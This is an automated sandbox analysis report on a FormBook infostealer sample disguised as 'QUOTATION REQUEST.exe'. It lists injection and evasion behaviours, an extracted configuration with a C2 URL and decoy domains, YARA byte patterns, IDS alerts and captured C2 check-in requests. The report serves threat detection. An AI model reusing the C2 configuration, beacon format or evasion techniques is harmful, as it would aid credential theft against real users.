Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name: QUOTATION REQUEST.exe
Analysis ID: 402973
MD5: 64af41000584694858d0fcc37b1bf69b
SHA1: 707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256: fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • QUOTATION REQUEST.exe (PID: 4660 cmdline: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: 64AF41000584694858D0FCC37B1BF69B)
    • QUOTATION REQUEST.exe (PID: 4112 cmdline: C:\Users\user\Desktop\QUOTATION REQUEST.exe MD5: 64AF41000584694858D0FCC37B1BF69B)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5268 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5784 cmdline: /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author
3.2.QUOTATION REQUEST.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.QUOTATION REQUEST.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.QUOTATION REQUEST.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}
Multi AV Scanner detection for submitted file
Source: QUOTATION REQUEST.exe | Virustotal: Detection: 18%
Source: QUOTATION REQUEST.exe | ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: QUOTATION REQUEST.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: QUOTATION REQUEST.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP | source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source: Binary string: wlanext.pdb | source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL | source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 4x nop then pop ebx | 3_2_00406AA3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 4x nop then pop edi | 3_2_0040C3C3
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop ebx | 9_2_00ED6AA3
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi | 9_2_00EDC3C3

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.pedroiniesta.net/n7ad/
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1 | Host: www.sloanksmith.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1 | Host: www.letsratethis.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1 | Host: www.cannabisllp.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1 | Host: www.buffalobooze.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1 | Host: www.checkmytradesmanswork.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1 | Host: www.inthebeginningshop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1 | Host: www.madisonroselove.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1 | Host: www.pedroiniesta.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1 | Host: www.freecleanlimpieza.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1 | Host: www.graet.design | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1 | Host: www.sloanksmith.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 46.30.211.38
Source: Joe Sandbox View | IP Address: 81.17.18.196
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: unknown | DNS traffic detected: queries for: www.sloanksmith.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Mon, 03 May 2021 14:51:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 
20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7
Source: explorer.exe, 00000005.00000000.253105057.00000000089FF000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: QUOTATION REQUEST.exe | String found in binary or memory: https://github.com/unguest
Source: QUOTATION REQUEST.exe | String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
